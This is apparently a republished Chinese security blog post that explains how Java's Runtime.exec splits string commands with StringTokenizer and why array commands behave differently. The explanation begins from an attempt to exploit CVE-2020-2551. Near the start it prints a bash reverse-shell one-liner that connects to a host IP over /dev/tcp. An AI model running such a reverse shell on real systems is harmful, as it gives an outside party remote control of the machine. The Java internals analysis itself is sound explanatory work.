前言
环境搭建
起因
CVE-2020-2551进行利用,我们首先进行curl命令执行看看是否可以执行命令。bash -i >& /dev/tcp/192.168.153.1/8080 0>&1(向右滑动、查看更多)
细节
字符串执行
this.exec((String)var1, (String[])null, (File)null)方法继续进行调用。StringTokenizer对类对象,传入的构造方法参数是我们需要执行的命令字符串。使用通过调用 new StringTokenizer(command) 创建的 StringTokenizer 将命令字符串分解为标记,而无需进一步修改字符类别。分词器生成的分词然后以相同的顺序放置在新的字符串数组 cmdarray 中
StringTokenizer类的构造方法中。为指定的字符串构造一个字符串分词器。分词器使用默认的分隔符集,即“\t\n\r\f”:空格字符、制表符、换行符、回车符和换页符。
\t\n\r\f等字符来进行分割成一块块的数组,主要的实现方法就是在exec方法中,首先调用StringTokenizer#countTokens来初始化cmdarray这个数组对象。skipDelimiters / scanToken这两个方法来进行切片操作的。nextToken方法来为前面初始化的数组进行赋值操作。public Process exec(String[] cmdarray, String[] envp, File dir)ProcessBuilder类对象的创建来,在Java中另一种执行命令的方式就是通过调用ProcessBuilder#start()方法来执行命令。这里进行了environment / 工作目录的初始化之后调用了start方法进行命令执行操作。/bin/sh / /bin/bash这些。可以注意到在其后面有一个System.getSecurityManager方法的调用,这个就是通过调用checkExec方法来判断该次的命令调用是否合法,也是Java内置的一种安全管理。ProcessImpl.start方法进行执行了,最后将会创建一个UNIXProcess类对象。/bin/bash这种运行环境,第二个参数就是后面紧跟的需要执行的命令,在这个类构造方法中,将会通过调用forkAndExec方法来创建了一个进程该方法返回了该进程的PID号。\t\n\r\f等分隔符进行分割,之后在进行命令的执行。数组执行
public Process exec(String cmdarray[])方法的调用中。public Process exec(String[] cmdarray, String[] envp, File dir)ProcessBuilder的构造方法中,之后调用start方法进行执行。StringTokenizer类对象来自动进行命令的分割,在某些情况下,将会造成命令不能执行的情况,数组方式是直接传入的自己已经分好块的命令数组进行命令执行,Java便不会自动将本应该在一起的命令分割开来造成错误。精彩推荐
文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651205397&idx=3&sn=fa8fb520069782e7a7fff29881dbaf86&chksm=bd1dbd9e8a6a34883ae5d0ea7f9be3b4fffe015bf3c6bf84dd96852f566c5bd1eb54e8f8641a#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh